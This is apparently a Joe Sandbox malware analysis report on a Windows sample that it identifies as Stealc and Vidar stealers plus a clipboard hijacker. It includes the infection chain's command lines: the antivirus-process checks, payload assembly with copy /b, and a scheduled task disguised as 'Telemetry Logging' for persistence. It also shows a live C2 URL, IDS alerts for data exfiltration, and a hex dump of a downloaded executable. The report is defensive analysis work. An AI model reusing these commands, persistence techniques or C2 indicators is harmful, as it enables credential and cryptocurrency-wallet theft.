Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1527287
MD5:1e31ae89e90ab1a25e4d578b19154bd7
SHA1:955ef96ad52954b6e2eff63b1a35694433e83d9b
SHA256:85104c53c0061dd183981df87ad8744c85d8c8c6f044698a1ed98705edaf4117
Tags:exeuser-Bitsight
Infos:

Detection

Clipboard Hijacker, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 3532 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 1E31AE89E90AB1A25E4D578B19154BD7)
    • cmd.exe (PID: 2948 cmdline: "C:\Windows\System32\cmd.exe" /c move Tag Tag.bat & Tag.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 6752 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 6320 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 5032 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 5208 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 320 cmdline: cmd /c md 627982 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 6408 cmdline: findstr /V "VoipBiographiesScholarPorno" Dis MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 6096 cmdline: cmd /c copy /b ..\Omissions + ..\Involve + ..\Retro + ..\Official + ..\Network + ..\Unlike + ..\Relates K MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Pct.pif (PID: 6312 cmdline: Pct.pif K MD5: 18CE19B57F43CE0A5AF149C96AECC685)
        • cmd.exe (PID: 432 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\KFCFBFHIEB.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • KFCFBFHIEB.exe (PID: 880 cmdline: "C:\ProgramData\KFCFBFHIEB.exe" MD5: AF6E384DFABDAD52D43CF8429AD8779C)
            • schtasks.exe (PID: 5900 cmdline: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
              • conhost.exe (PID: 1484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 1424 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • oobeldr.exe (PID: 3000 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe MD5: AF6E384DFABDAD52D43CF8429AD8779C)
    • schtasks.exe (PID: 4568 cmdline: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://45.145.4.234/ce4b71a59f4ee761.php", "Botnet": "default"}

Threatname: Vidar

{"C2 url": "http://45.145.4.234/ce4b71a59f4ee761.php", "Botnet": "default"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000016.00000002.3807704895.0000000000401000.00000020.00000001.01000000.0000000A.sdmpWindows_Trojan_Clipbanker_f9f9e79dunknownunknown
    • 0x4c6:$a1: 7E 7E 0F B7 04 77 83 F8 41 74 69 83 F8 42 74 64 83 F8 43 74 5F 83
    00000016.00000002.3807704895.0000000000401000.00000020.00000001.01000000.0000000A.sdmpWindows_Trojan_Clipbanker_787b130bunknownunknown
    • 0x1354:$mutex_setup: 55 8B EC 83 EC 20 53 56 57 E8 9E EC FF FF 68 30 30 40 00 6A 00 6A 00 FF 15 40 40 40 00 FF 15 2C 40 40 00 3D B7 00 00 00 75 08 6A 00 FF 15 10 30 40 00
    0000000B.00000002.3807123175.0000000001BE0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      0000000B.00000003.3594009510.0000000001EB7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        0000000B.00000003.3593733373.0000000001C2C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Click to see the 16 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          11.3.Pct.pif.1b79858.8.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
            11.2.Pct.pif.1e0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
              11.2.Pct.pif.1a82888.4.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                11.2.Pct.pif.1a82888.4.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  25.2.oobeldr.exe.400000.0.unpackJoeSecurity_Clipboard_HijackerYara detected Clipboard HijackerJoe Security
                    Click to see the 5 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Execution of Suspicious File Type Extension
                    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Pct.pif K, CommandLine: Pct.pif K, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\627982\Pct.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\627982\Pct.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\627982\Pct.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Tag Tag.bat & Tag.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2948, ParentProcessName: cmd.exe, ProcessCommandLine: Pct.pif K, ProcessId: 6312, ProcessName: Pct.pif
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe", CommandLine: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe, ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe, ParentProcessId: 3000, ParentProcessName: oobeldr.exe, ProcessCommandLine: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe", ProcessId: 4568, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe", CommandLine: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\ProgramData\KFCFBFHIEB.exe" , ParentImage: C:\ProgramData\KFCFBFHIEB.exe, ParentProcessId: 880, ParentProcessName: KFCFBFHIEB.exe, ProcessCommandLine: /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe", ProcessId: 5900, ProcessName: schtasks.exe

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Sigma detected: Search for Antivirus process
                    Source: Process startedAuthor: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Tag Tag.bat & Tag.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2948, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 5208, ProcessName: findstr.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-06T22:18:54.054899+020020197142Potentially Bad Traffic192.168.2.663886103.6.198.219443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-06T22:18:40.811887+020020442451Malware Command and Control Activity Detected45.145.4.23480192.168.2.663885TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-06T22:18:40.805920+020020442441Malware Command and Control Activity Detected192.168.2.66388545.145.4.23480TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-06T22:18:40.986876+020020442461Malware Command and Control Activity Detected192.168.2.66388545.145.4.23480TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-06T22:18:51.307264+020020442491Malware Command and Control Activity Detected192.168.2.66388545.145.4.23480TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-06T22:18:41.490286+020020442481Malware Command and Control Activity Detected192.168.2.66388545.145.4.23480TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-06T22:18:40.995303+020020442471Malware Command and Control Activity Detected45.145.4.23480192.168.2.663885TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-06T22:18:40.621922+020020442431Malware Command and Control Activity Detected192.168.2.66388545.145.4.23480TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-06T22:18:41.954591+020028033043Unknown Traffic192.168.2.66388545.145.4.23480TCP
                    2024-10-06T22:18:45.687780+020028033043Unknown Traffic192.168.2.66388545.145.4.23480TCP
                    2024-10-06T22:18:46.599644+020028033043Unknown Traffic192.168.2.66388545.145.4.23480TCP
                    2024-10-06T22:18:47.174523+020028033043Unknown Traffic192.168.2.66388545.145.4.23480TCP
                    2024-10-06T22:18:47.770123+020028033043Unknown Traffic192.168.2.66388545.145.4.23480TCP
                    2024-10-06T22:18:49.399754+020028033043Unknown Traffic192.168.2.66388545.145.4.23480TCP
                    2024-10-06T22:18:49.858554+020028033043Unknown Traffic192.168.2.66388545.145.4.23480TCP
                    2024-10-06T22:18:54.054899+020028033043Unknown Traffic192.168.2.663886103.6.198.219443TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\l3[1].exeAvira: detection malicious, Label: HEUR/AGEN.1304053
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeAvira: detection malicious, Label: HEUR/AGEN.1304053
                    Source: C:\ProgramData\KFCFBFHIEB.exeAvira: detection malicious, Label: HEUR/AGEN.1304053
                    Found malware configuration
                    Source: 11.2.Pct.pif.1e0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://45.145.4.234/ce4b71a59f4ee761.php", "Botnet": "default"}
                    Source: 11.2.Pct.pif.1e0000.0.unpackMalware Configuration Extractor: Vidar {"C2 url": "http://45.145.4.234/ce4b71a59f4ee761.php", "Botnet": "default"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\ProgramData\KFCFBFHIEB.exeReversingLabs: Detection: 73%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\l3[1].exeReversingLabs: Detection: 73%
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeReversingLabs: Detection: 73%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.9% probability
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_6CC36C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,11_2_6CC36C80
                    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 103.6.198.219:443 -> 192.168.2.6:63886 version: TLS 1.2
                    Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: mozglue.pdbP source: Pct.pif, 0000000B.00000002.3830830020.000000006CC9D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.11.dr, mozglue.dll.11.dr
                    Source: Binary string: freebl3.pdb source: freebl3.dll.11.dr, freebl3[1].dll.11.dr
                    Source: Binary string: freebl3.pdbp source: freebl3.dll.11.dr, freebl3[1].dll.11.dr
                    Source: Binary string: nss3.pdb@ source: Pct.pif, 0000000B.00000002.3831048696.000000006CE5F000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr
                    Source: Binary string: softokn3.pdb@ source: softokn3.dll.11.dr, softokn3[1].dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.11.dr, vcruntime140[1].dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.11.dr, msvcp140.dll.11.dr
                    Source: Binary string: nss3.pdb source: Pct.pif, 0000000B.00000002.3831048696.000000006CE5F000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr
                    Source: Binary string: mozglue.pdb source: Pct.pif, 0000000B.00000002.3830830020.000000006CC9D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.11.dr, mozglue.dll.11.dr
                    Source: Binary string: softokn3.pdb source: softokn3.dll.11.dr, softokn3[1].dll.11.dr
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C24005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00C24005
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C2C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00C2C2FF
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C2494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_00C2494A
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C2CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_00C2CD9F
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C2CD14 FindFirstFileW,FindClose,11_2_00C2CD14
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C2F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00C2F5D8
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C2F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00C2F735
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C2FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00C2FA36
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C23CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00C23CE2
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\627982Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\627982\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:63885 -> 45.145.4.234:80
                    Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:63885 -> 45.145.4.234:80
                    Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 45.145.4.234:80 -> 192.168.2.6:63885
                    Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:63885 -> 45.145.4.234:80
                    Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 45.145.4.234:80 -> 192.168.2.6:63885
                    Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:63885 -> 45.145.4.234:80
                    Source: Network trafficSuricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.6:63885 -> 45.145.4.234:80
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: http://45.145.4.234/ce4b71a59f4ee761.php
                    Source: Malware configuration extractorURLs: http://45.145.4.234/ce4b71a59f4ee761.php
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 06 Oct 2024 20:18:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
